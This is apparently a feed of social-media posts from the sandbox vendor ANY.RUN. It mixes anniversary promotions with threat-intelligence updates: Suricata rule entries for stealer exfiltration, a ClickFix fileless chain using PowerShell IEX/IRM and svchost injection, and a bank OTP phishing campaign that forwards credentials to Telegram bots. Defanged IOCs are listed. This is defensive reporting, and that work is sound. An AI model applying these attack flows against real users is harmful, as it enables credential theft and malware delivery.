ANY.RUN

🎉 #ANYRUN turns 10: Celebrate with exclusive anniversary offers! Bring together interactive sandbox analysis, threat intel, and automation into your existing SIEM/SOAR. Help your SOC stay resilient against modern threats ⚡️ Secure the offer by May 31: app.any.run/plans/?utm_sou…

🚨 #ClickFix attacks surged 500%+ in 2025. No exploit chain or malicious file, just a fake CAPTCHA that tricks employees into running malware themselves. ❗️ ClickFix puts organizations’ credentials, data, and operations at risk. How to detect & protect: any.run/malware-trends…

Meet #ANYRUN at @Infosecurity Europe 2026 🇬🇧 📍 Visit Stand C62 to see how CISOs scale enterprise SOC & MSSP operations, improve analysis efficiency, and reduce strategic blind spots against modern malware and phishing threats. 🎟️ Claim your ticket: infosecurityeurope.com/en-gb/register…

⚡️ Scale your SOC's triage & response with solutions trusted by 74 Fortune 100 companies. Get an exclusive 10th anniversary deal for your team: app.any.run/plans/?utm_sou…

🎯 We added and updated 57 Suricata rules based on real attacker behavior observed in the wild. Explore the examples and strengthen your detection. #ANYRUNSuricataChangelog 05/18 – 05/24/2026 Here are 10 examples 👇 89003459 | PHISHING [ANY.RUN] Spain-targeted finance-themed phish campaign related HTTP GET request. Example analysis session: app.any.run/tasks/bde57fdd… 89003460 | LOADER [ANY.RUN] Linux/Redtail related HTTP GET request (/sh). Example analysis session: app.any.run/tasks/22943924… 89003461 | FRAUD [ANY.RUN] Suspected Fraud Redirect HTTP GET request. Example analysis session: app.any.run/tasks/aa4fe507… 89003479 | PHISHING [ANY.RUN] Generic Phishkit related URL (/gw.php). Example analysis session: app.any.run/tasks/9a3e0f19… 89003493 | FRAUD [ANY.RUN] Cryptocurrency-themed fraud campaign related URL (/index/index-*.js). Example analysis session: app.any.run/tasks/cc5b63a8… 89003495 | FRAUD [ANY.RUN] Cryptocurrency-themed fraud campaign related URL (/api/index/login). Example analysis session: app.any.run/tasks/32b3314f… 84003033 | STEALER [ANY.RUN] TeamPCP activity observed in HTTP response (python script). Example analysis session: app.any.run/tasks/51f0a857… 84003035 | STEALER [ANY.RUN] TeamPCP exfil activity observed (envelope:key). Example analysis session: app.any.run/tasks/b281830a… 84003036 | STEALER [ANY.RUN] Win32/Generic exfil activity observed (Chromium-Edge-Cookies). Example analysis session: app.any.run/tasks/1aa0f178… 84003037 | STEALER [ANY.RUN] UltimateStealer exfil activity observed. Example analysis session: app.any.run/tasks/97a90799… Explore the complete ruleset: linkedin.com/pulse/anyrun-s…

⚠️ Threat volume increased across nearly every major malware family last week. #XWorm, #Netwire, #Warzone, and #DCRat all saw strong growth, alongside continued #Vidar activity. 📌 Trend to watch: this kind of broad growth usually points to multiple active distribution chains running in parallel. For SOC teams, that means overlapping alerts, noisier triage, and a higher chance of missing escalation paths early. ⚡️ Gain absolute threat visibility inside your SIEM/SOAR. Get an exclusive 10th anniversary deal for your team: app.any.run/plans/?utm_sou… #Top10Malware

👨‍💻 Learn how to strengthen your SOC's detection of AI-generated, encrypted, and multi-stage phishing: any.run/phishing/?utm_…

⚠️ 15-minute #phishing analysis vs 60 seconds. At scale, the gap costs full FTEs. #ANYRUN Sandbox automates every step and decrypts HTTPS in 100% of sessions, boosting SSL-decrypted phishing detection by 5x. 🎯 Get an exclusive deal for your team: app.any.run/plans/?utm_sou…

🚀 Detect critical threats and speed up your response to keep the business safe. Access our exclusive 10th-anniversary deals: app.any.run/plans/?utm_sou…

🚨 OAuth device code #phishing bypasses the usual fake-login-page pattern: users sign in through a legitimate authentication flow while attackers receive the access token, leaving fewer classic phishing indicators for SOC teams to detect. In the #EvilTokens campaign, attackers abused Microsoft’s OAuth Device Code flow to gain M365 access without directly stealing credentials. See the full attack flow in an analysis session: app.any.run/tasks/885afc1c… 🔍 Explore 5 social engineering attacks creating SOC blind spots in 2026: any.run/cybersecurity-…

@d4rk_intel Appreciate you sharing! 🙌

Happy 10th anniversary to @anyrun_app. I'm super excited to share how I have benefits greatly from this amazing platform. If you're looking to strengthen your team's defenses against emerging threats, take advantage of the discount offer available until May 31. #OSINT #AnyRun

🎉 Maximize your SOC’s ROI with better business risk visibility. Get an exclusive 10th anniversary deal for your team: any.run/plans/?utm_sou…

🚀 64% of Fortune 500 already rely on #ANYRUN. Real numbers from one of them: 40% faster triage, 24% better MTTR, 35% fewer unnecessary escalations ⚡️ Learn what their SOC did, why it worked, and how to apply it in yours👇 any.run/cybersecurity-…

🚀 Prevent incidents with early threat detection. Get an exclusive 10th anniversary deal for your team: app.any.run/plans/?utm_sou…

🏦 Over 1,100 financial institutions, from global banks to fintech startups, trust #ANYRUN in their SOC. They lower breach risk, protect customer trust, and avoid millions in incident recovery costs. ⚡️ See how #ANYRUN fits financial SOC workflows: any.run/by-industry/fi…

👋 Heading to @CONFidenceConf? Say hi to the #ANYRUN team! We’ll share how enterprise SOCs & MSSPs use our proactive security solutions to investigate threats with greater clarity and more confident decision-making across the full investigation cycle. ⚡️ See you there!

🚨 𝗟𝗲𝗴𝗶𝘁𝗶𝗺𝗮𝘁𝗲 𝗕𝟮𝗕 𝗪𝗲𝗯𝘀𝗶𝘁𝗲𝘀 𝗔𝗯𝘂𝘀𝗲𝗱 𝗳𝗼𝗿 𝗙𝗶𝗹𝗲𝗹𝗲𝘀𝘀 𝗠𝗮𝗹𝘄𝗮𝗿𝗲 𝗗𝗲𝗹𝗶𝘃𝗲𝗿𝘆: 𝗗𝗲𝘁𝗲𝗰𝘁 𝗜𝘁 𝗘𝗮𝗿𝗹𝘆 We’re tracking widespread #ClickFix activity using compromised legitimate websites to deliver fileless malware, lowering suspicion and delaying detection. ⚠️ Finance, banking, healthcare, manufacturing, and tech are among the most exposed industries. ❗️ The activity looks low-risk until fileless execution and outbound C2 traffic are already established. Attackers inject a lightweight inline JavaScript loader into compromised sites, which retrieves a second-stage payload directly into the victim’s browser from external infrastructure. The attack chain blends into normal web traffic, relies on PowerShell and in-memory execution, and later shifts C2 communication into the legitimate system process svchost.exe, making malicious activity harder to distinguish from routine system behavior for SOC and MSSP teams. ⚡️ #ANYRUN Sandbox helps teams validate suspicious activity faster and contain fileless attacks before they escalate. Analysts can observe the full execution chain in real time: Inline JS loader ➡️ User-executed PowerShell (IEX/IRM) ➡️ Hidden second-stage PowerShell and loader retrieval ➡️ Fileless in-memory execution inside powershell.exe ➡️ Follow-on .NET payload delivery ➡️ svchost.exe injection ➡️ Custom TCP C2 🚨 👨‍💻 Learn how #ANYRUN helps security teams detect complex threats and contain incidents faster: any.run/enterprise/?ut… 📈 Scale your SOC with solutions trusted by 74 Fortune 100 companies. Get an exclusive 10th anniversary deal for your team: app.any.run/plans/?utm_sou… IOCs: /jsrepo?rnd= /teamrepo?rnd= ntdnewtds[.]shop dnsnewtds[.]shop sdntds[.]shop newtdsone[.]shop nttdss[.]shop Dntds[.]shop 178[.]16[.]52[.]232 158[.]94[.]208[.]92 158[.]94[.]208[.]104 91[.]92[.]243[.]161 #ExploreWithANYRUN

Most delays happen between triage and escalation ⚠️ Bridge the gap with a SOC-ready report: clear verdict, AI Summary, MITRE mapping, and key IOCs 🎯 Get better visibility into incident severity & impact fast. Learn how to improve response and reporting: any.run/cybersecurity-…

⚡ The fastest way to maximize Microsoft Defender's ROI: layer #ANYRUN on top. Built directly into the MS Defender alert flow, it provides faster MTTR, fewer escalations, and lower Tier 1 workload. 🎯 Set it up in minutes and watch the metrics shift: any.run/cybersecurity-…

@hipdead010 Thank you for sharing! 🙌

¡Una década de @anyrun_app revolucionando el análisis de malware, threat intelligence y operaciones SOC! 🥳🔥 Y lo celebran como se merece: ¡dos semanas de ofertas especiales! No dejes pasar esto. 👇 x.com/anyrun_app/sta…

IOCs: Domains bank-esl-org[.]lat review-esl-org[.]lat onlinefraud-esl-org[.]cfd verify-esl-org[.]lat charge-esl-org[.]lat SHA256 chc.png: 69a24c59a815b1b35e7ab3946636c2f7d667269b4ec32b50322307b788512386 image.png: 6318a4002e35166a523c0016af99b51f2c2f72b304569d0519cc0f7389fc8771 member-fdic.svg: 8b69a3707a2ef4a748dd6c9923a1fa17d1ed5d32eee6e60240540217cf30b324 equal-housing-lender.svg: e4bc94279e093f25720c2867e7a08dbfaaa140636f11eab5ac4e204a93a3751e

🚨 𝗨𝗦 𝗕𝗮𝗻𝗸𝗶𝗻𝗴 𝗨𝘀𝗲𝗿𝘀 𝗧𝗮𝗿𝗴𝗲𝘁𝗲𝗱 𝗶𝗻 𝗟𝗮𝗿𝗴𝗲-𝗦𝗰𝗮𝗹𝗲 𝗢𝗧𝗣 𝗣𝗵𝗶𝘀𝗵𝗶𝗻𝗴 𝗖𝗮𝗺𝗽𝗮𝗶𝗴𝗻 We’re tracking a large-scale #phishing campaign impersonating ESL Federal Credit Union, a U.S. financial institution, with ongoing high-volume activity observed since November 2025. The infrastructure and flow are highly reusable and can be quickly adapted to impersonate other financial organizations. ⚠️ The campaign uses a multi-step phishing flow to steal usernames, passwords, OTP codes, and email verification data, creating serious account takeover and fraud risk at this scale. ❗️ Unlike short-lived phishing operations, this activity has remained active for months with constantly rotating infrastructure. More than 230 phishing domains have already been identified, most registered in .sbs, .cfd, and .click zones. After credential submission, victim data is sent through a chain of POST requests and forwarded to Telegram bots through attacker-controlled iframe responses. The campaign then moves into a second phishing stage focused on email verification, adding another layer of credential harvesting and OTP interception. ⚡️ With #ANYRUN Sandbox and Threat Intelligence, teams can validate suspicious activity earlier, monitor credential exfiltration in real time, and identify related infrastructure before campaign spread further. Analysts can track POST-based credential theft, C2 communication, OTP interception stages, and repeated patterns across hundreds of related samples. 👨‍💻 See the phishing flow, credential exfiltration chain, and collect IOCs: app.any.run/tasks/57a49b17… 📌 Even with constant domain rotation, the campaign keeps reusing the same phishing-page images, endpoint structure, and multi-step authentication flow. These repeating artifacts make the activity trackable across newly deployed phishing sites. 🔍 Hunt for related phishing infrastructure using recurring campaign artifacts in TI Lookup: intelligence.any.run/analysis/looku… 🚀 See how SOC teams improve phishing detection and incident response with #ANYRUN: any.run/phishing/?utm_… 🎉 Celebrate #ANYRUN’s 10th anniversary with us! Explore special offers for high-performing security teams: app.any.run/plans/?utm_sou… #ExploreWithANYRUN